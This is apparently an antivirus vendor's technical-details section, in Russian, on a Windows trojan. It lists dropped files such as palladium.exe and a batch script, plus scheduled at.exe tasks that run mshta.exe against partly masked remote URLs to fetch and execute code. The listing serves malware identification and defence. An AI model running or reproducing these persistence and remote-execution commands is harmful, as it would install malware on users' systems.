Техническая информация
- %APPDATA%\z.exe lee_01
- <SYSTEM32>\at.exe 00:12 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###cats.com/sadsad.php?sa#####
- <SYSTEM32>\at.exe 01:12 /every:M,T,W,Th,F,S,Su mshta.exe http://dr###cats.com/sadsad.php?sa#####
- <SYSTEM32>\mshta.exe http://re####rererere.com/inst.php?id#######
- <SYSTEM32>\cmd.exe /c ""%APPDATA%\dgfdgsdf.bat" "
- <SYSTEM32>\at.exe
- %APPDATA%\uid_pal
- %APPDATA%\palladium.exe
- %APPDATA%\dgfdgsdf.bat
- %APPDATA%\a.txt
- %APPDATA%\b.txt
- %APPDATA%\z.exe
- %APPDATA%\z.exe
- %APPDATA%\b.txt
- %APPDATA%\a.txt
- ClassName: 'MS_WINHELP' WindowName: ''